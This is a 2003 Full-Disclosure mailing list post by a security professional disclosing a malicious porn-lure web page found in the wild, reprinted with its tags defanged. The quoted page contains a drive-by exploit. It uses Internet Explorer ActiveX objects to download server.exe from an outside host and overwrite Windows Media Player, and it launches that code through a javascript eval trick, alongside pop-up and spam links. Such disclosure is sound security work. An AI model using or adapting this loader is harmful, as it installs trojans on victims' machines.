Full Disclosure mailing list archives
interesting trojan in the wild
From: Michael Scheidell <scheidell () secnap net>
Date: Wed, 8 Oct 2003 11:32:46 -0400 (EDT)
This just found in the wild: I replaced the < character with a ^ to make sure the script doesnt inadvertantly run on your machine this replaces your media player with a trojan, and I'm assuming on MSIE is vulnerable heres the code ^script language="JavaScript"> ^!-- document.cookie='from=noref; expires=Wednesday, 8-Oct-03 23:17:30 GMT;'; //--> ^/script> ^html> ^head> ^script language="Javascript"> ^!-- var exit=true; function exitmoney() { if (exit) open("http://www.freemedias.com/pop.html","new_window"); } //--> ^/script> ^meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> ^meta name="GENERATOR" content="Microsoft FrontPage 4.0"> ^meta name="ProgId" content="FrontPage.Editor.Document"> ^title>FREE PORN GALLERY^/title> ^/head> ^body onUnload="exitmoney()"> ^textarea id="code" style="display:none;"> var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://www.freemedias.com/404/server.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; ^/textarea> ^script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i^lines.length;i++) { line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/'/g,"\\'"); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/[/]/g,"%2f"); if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media"); } window.open("ieerror.php","_media"); setTimeout("doit()", 3000); ^/script> ^p align="center"> ^A href="http://www.vigrx.com/clicks/clickthrough.html?a=sexxxsite&b=172" onclick="exit=false">^IMG src="vigpillhorizontal15.gif" border=0 width="468" height="80">^/A>^br> ^b>EVERY TIME YOU REFRESH THIS PAGE NEW PICTURES WILL SHOW!.^/b> ^p align="center"> ^script src="start.php">^/script> ^script src="randpic.php?1">^/script> ^script src="randpic.php?2">^/script> ^script src="randpic.php?3">^/script> ^script src="randpic.php?4">^/script>^br> ^script src="randpic.php?5">^/script> ^script src="randpic.php?6">^/script> ^script src="randpic.php?7">^/script> ^script src="randpic.php?8">^/script>^br> ^script src="randpic.php?9">^/script> ^script src="randpic.php?10">^/script> ^script src="randpic.php?11">^/script> ^script src="randpic.php?12">^/script>^br> ^script src="end.php">^/script> ^/p> ^p align="center">^font face="Arial Narrow" size="4">^b>NO CREDIT CARD - NO BANK ACCOUNT - NO AGE VERIFICATION^/b>^/font>^a href="http://c.fsx.com/c?z=548,81084,8,pffa,pinkforfree.com/" onclick="exit=false">^font face="Arial Narrow" size="4">^b>^br> ^/b>^/font>^img src="http://www.pinkforfree.com/banners/banners/p4f_468-05.jpg" width="468" height="60">^br> ^/a>^b>100% FREE HIGH QUALITY PORN^/b>^/p> ^/body> ^/html> -- Michael Scheidell SECNAP Network Security, LLC Main: 561-368-9561 / www.secnap.net Looking for a career in Internet security? http://www.secnap.net/employment/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- interesting trojan in the wild Michael Scheidell (Oct 08)